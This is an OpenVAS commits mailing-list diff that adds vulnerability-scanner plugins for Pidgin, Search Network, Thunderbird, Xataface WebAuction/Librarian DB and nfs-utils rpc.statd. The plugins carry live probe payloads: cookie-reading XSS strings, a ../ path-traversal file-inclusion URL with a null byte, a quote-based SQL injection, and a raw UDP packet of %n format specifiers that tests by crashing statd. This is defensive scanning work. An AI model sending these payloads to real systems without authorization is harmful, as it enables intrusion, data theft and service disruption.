+  References:
+  http://secunia.com/advisories/45663
+  http://pidgin.im/news/security/?id=53
+  http://pidgin.im/news/security/?id=54
+  http://pidgin.im/news/security/?id=55
+  http://securitytracker.com/id?1025961 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Pidgin");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  script_dependencies("secpod_pidgin_detect_win.nasl");
+  script_require_keys("Pidgin/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get Pidgin Version from KB
+pidginVer = get_kb_item("Pidgin/Win/Ver");
+
+if(pidginVer != NULL)
+{
+  ## Check for Pidgin Versions Prior to 2.10.0
+  if(version_is_less(version:pidginVer, test_version:"2.10.0")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_search_network_xss_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,108 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_search_network_xss_vuln.nasl 16584 2011-09-07 10:35:01Z sep $
+#
+# Search Network 'search.php' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801974);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49064);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Search Network 'search.php' Cross Site Scripting Vulnerability");
+  desc = "
+  Overview: This host is running Search Network and is prone to cross site
+  scripting vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to failure in the 'search.php' script to properly
+  sanitize user supplied input in 'action' and 'query' parameters.
+
+  Impact:
+  Successful exploitation could allow execution of scripts or actions
+  written by an attacker. In addition, an attacker may obtain authorisation
+  cookies that would allow him to gain unauthorised access to the application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Search Network version 2.0 and prior.
+
+  Fix: No solution or patch is available as on 07th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.searchnetworkhq.com/
+
+  References:
+  http://www.securityfocus.com/bid/49064/exploit
+  http://packetstormsecurity.org/files/view/103780/searchnetwork-xss.txt ";
+
+  script_description(desc);
+  script_summary("Check if Search Network is vulnerable to XSS");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Chek Host Supports PHP
+if(!can_host_php(port:port)) {
+  exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/sn", "/search_network", "/"))
+{
+  ## Send and Receive the response
+  req = http_get(item:string(dir,"/index.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if("www.searchnetworkhq.com" >< res)
+  {
+    req = http_get(item:string(dir, '/index.php?searchType=Videos&query' +
+          '="<script>alert(document.cookie)<%2Fscript>'), port:port);
+
+    res = http_keepalive_send_recv(port:port, data:req);
+
+    ## Confirm exploit worked by checking the response
+    if('"<script>alert(document.cookie)</script>' >< res)
+    {
+      security_warning(port);
+      exit(0);
+    }
+  }
+}

Modified: trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_thunderbird_detect_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -7,6 +7,9 @@
 # Authors:
 # Chandan S <schandan at secpod.com>
 #
+# Updated by: Madhuri D <dmadhuri at secpod.com> on 2011-09-08
+#    Added security_note to display the version of thunderbird
+#
 # Copyright:
 # Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net
 #
@@ -57,16 +60,17 @@
 }
 
 # Get ThunderBird Version from Registry
-birdVer = registry_get_sz(item:"CurrentVersion", 
+birdVer = registry_get_sz(item:"CurrentVersion",
                           key:"SOFTWARE\Mozilla\Mozilla Thunderbird");
-if(!birdVer){
-  exit(0);
-}
-
-if(!ereg(pattern:"1\.5[^.0-9]", string:birdVer))
+if(birdVer)
 {
-  birdVer = eregmatch(pattern:"[0-9.]+", string:birdVer);
-  set_kb_item(name:"Thunderbird/Win/Ver",value:birdVer[0]);
+  if(!ereg(pattern:"1\.5[^.0-9]", string:birdVer))
+  {
+    birdVer = eregmatch(pattern:"[0-9.]+", string:birdVer);
+    set_kb_item(name:"Thunderbird/Win/Ver",value:birdVer[0]);
+    security_note(data:"Mozilla Thunderbird version " + birdVer[0] +
+                         " was detected on the host");
+  }
   exit(0);
 }
 

Added: trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_xadataface_webauction_n_librariandb_mult_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,156 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_xadataface_webauction_n_librariandb_mult_vuln.nasl 17038 2011-09-09 14:14:14Z sep $
+#
+# Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801981);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"6.4");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities");
+  desc = "
+  Overview: This host is running Xataface WebAuction/Librarian DB and is prone
+  multiple vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to  input passed to the,
+  - '-action' parameter in 'index.php' is not properly verified. This can be
+    exploited to read complete installation path.
+  - 'list&-table' and '-action' parameter in 'index.php' page is not properly
+    verified before being used in an SQL query. This can  be exploited to
+    manipulate SQL queries by injecting arbitrary SQL queries.
+  - '-action' and 'list&-table' parameter in 'index.php'  page is not properly
+    verified before it is returned to the user. This can be exploited to
+    execute arbitrary HTML and script code in a user's browser session in the
+    context of a vulnerable site.
+  - 'list&-lang' and '-table' parameter in 'index.php' page is not properly
+    verified before it is returned to the user. This can be exploited to
+    execute arbitrary HTML and script code in a user's browser session in the
+    context of a vulnerable site.
+  - 'list&-lang' parameter in 'index.php' is not properly verified before
+    using it to include files. This can be exploited to include arbitrary
+    files from external and local resources.
+
+  Impact:
+  Successful exploitation could allow an attacker to execute arbitrary HTML
+  code in a user's browser session in the context of a vulnerable application
+  or to manipulate SQL queries by injecting arbitrary SQL code or to include
+  arbitrary files from external and local resources.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Xataface WebAuction Version 0.3.6 and prior.
+  Xataface Librarian DB version 0.2 and prior.
+
+  Fix: No solution or patch is available as on 09th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://xataface.com/
+
+  References:
+  http://secpod.org/blog/?p=350
+  http://www.exploit-db.com/exploits/17813
+  http://secpod.org/advisories/SECPOD_Xataface_Webauction_Mult_Vuln.txt ";
+
+  script_description(desc);
+  script_summary("Determine multiple flaws in Xataface WebAuction/Librarian DB");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+if (!can_host_php(port:port)){
+  exit(0);
+}
+
+## check for each possible path
+foreach dir (make_list("/webauction", "/librariandb", "", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item:string(dir,"/index.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if('>WebAuction</' >< res || "Books - Dataface Application<" >< res)
+  {
+    ## Check for the local file inclusion
+    files = traversal_files();
+    foreach file (keys(files))
+    {
+      ## Construct exploit string
+      url = string(dir, "/index.php?-table=books&-action=browse_by_cat&-curs" +
+                   "or=0&-skip=0&-limit=30&-mode=list&-lang=../../../../../." +
+                   "./../../../", files[file],'%00');
+
+      ## Confirm exploit worked properly or not
+      if(http_vuln_check(port:port, url:url, pattern:file))
+      {
+        security_hole(port:port);
+        exit(0);
+      }
+    }
+
+    ## Check for the SQL injection
+    req = http_get(item:string(dir,"/index.php?-table='"), port:port);
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    ## Check the SQL result
+    if("The mysql error returned was" >< res)
+    {
+      security_hole(port:port);
+      exit(0);
+    }
+
+    ## Check for the XSS
+    req = http_get(item:string(dir, '/index.php?-table=books&-action=browse_' +
+                   'by_cat&-cursor=0&-skip=0&-limit=30&-mode=list&-lang="<sc' +
+                   'ript>alert("OpenVAS-XSS-TEST")</script>'), port:port);
+
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    ## Check the response
+    if('<script>alert("OpenVAS-XSS-TEST")</script>' >< res)
+    {
+      security_hole(port:port);
+      exit(0);
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/secpod_nfs_rpc_statd_mult_format_string_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,126 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_nfs_rpc_statd_mult_format_string_vuln.nasl 16455 2011-08-27 12:14:17 aug $
+#
+# Nfs-utils rpc.statd Multiple Remote Format String Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902725);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2000-0666", "CVE-2000-0800");
+  script_bugtraq_id(1480);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Nfs-utils rpc.statd Multiple Remote Format String Vulnerabilities");
+  desc = "
+  Overview: The host is running statd service and is prone to multiple remote
+  format string vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to errors in rpc.statd/kstatd daemons logging
+  system. A call to syslog in the program takes data directly from the remote
+  user, this data could include printf-style format specifiers.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code with
+  the privileges of the rpc.statd process, typically root.
+
+  Impact Level: System/Application
+
+  Fix: Upgrade to latest of nfs-utils version 0.1.9.1 or later,
+  For updates refer, http://sourceforge.net/projects/nfs/files/nfs-utils/
+
+  References:
+  http://www.cert.org/advisories/CA-2000-17.html
+  http://www.iss.net/security_center/reference/vuln/RPC_Statd_Format_Attack.htm
+  http://support.coresecurity.com/impact/exploits/191000d57f477b31f74df301b1d96722.html ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_summary("Check the presence of a RPC service");
+  script_category(ACT_ATTACK);
+  script_family("RPC");
+  script_dependencies("secpod_rpc_portmap.nasl");
+  script_require_keys("rpc/portmap");
+  exit(0);
+}
+
+include("misc_func.inc");
+
+RPC_PROG = "100024";
+
+## Get the rpc port, running statd service
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+  ## Check if udp port is alive by sending some data
+  req = raw_string(0x78, 0xE0, 0x80, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x02, 0x00, 0x01, 0x86, 0xB8, 0x00, 0x00, 0x00, 0x01,
+                   0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+                   0x00, 0x20, 0x3A, 0x0B, 0xB6, 0xB8, 0x00, 0x00, 0x00, 0x09,
+                   0x6C, 0x6F, 0x63, 0x61, 0x6C, 0x68, 0x6F, 0x73, 0x74, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x4E, 0x00, 0x00, 0x00);
+
+  ## open socket
+  soc = open_sock_udp(port);
+
+  ## send the request and get the response
+  send(socket:soc, data:req);
+  res = recv(socket:soc, length:4096);
+
+  if(res == NULL){
+    exit(0);
+  }
+
+  # rpc.statd is running. Construct the exploit containing '%n'
+  req = raw_string(0x42, 0x99, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x02, 0x00, 0x01, 0x86, 0xB8, 0x00, 0x00,
+                   0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+                   0x01, 0x00, 0x00, 0x00, 0x20, 0x3A, 0x0B, 0xB4, 0xB3,
+                   0x00, 0x00, 0x00, 0x09, 0x6C, 0x6F, 0x63, 0x61, 0x6C,
+                   0x68, 0x6F, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                   0x00, 0x00, 0x00, 0x28, 0x6E, 0x25, 0x6E, 0x25, 0x6E,
+                   0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25,
+                   0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E,
+                   0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25,
+                   0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25, 0x6E, 0x25);
+
+  ## send the crafted data
+  send(socket:soc, data:req);
+  res = recv(socket:soc, length:1024);
+
+  sleep(5);
+
+  ## Confirm vulnerability by checking response
+  if(!res){
+    security_hole(port:port, protocol:"udp");
+  }
+
+  ## Close the socket
+  close(soc);
+}



More information about the Openvas-commits mailing list